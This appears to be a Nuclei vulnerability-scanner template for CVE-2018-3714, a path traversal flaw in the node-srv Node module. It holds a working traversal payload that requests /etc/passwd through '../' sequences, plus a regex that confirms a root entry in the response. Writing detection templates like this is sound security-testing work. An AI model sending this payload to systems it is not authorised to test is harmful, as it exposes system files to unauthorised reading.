nuclei-templates/cves/2018/CVE-2018-3714.yaml

30 lines
791 B
YAML

id: CVE-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: medium
description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path.
reference:
- https://hackerone.com/reports/309124
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2018-3714
cwe-id: CWE-22
tags: cve,cve2018,nodejs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body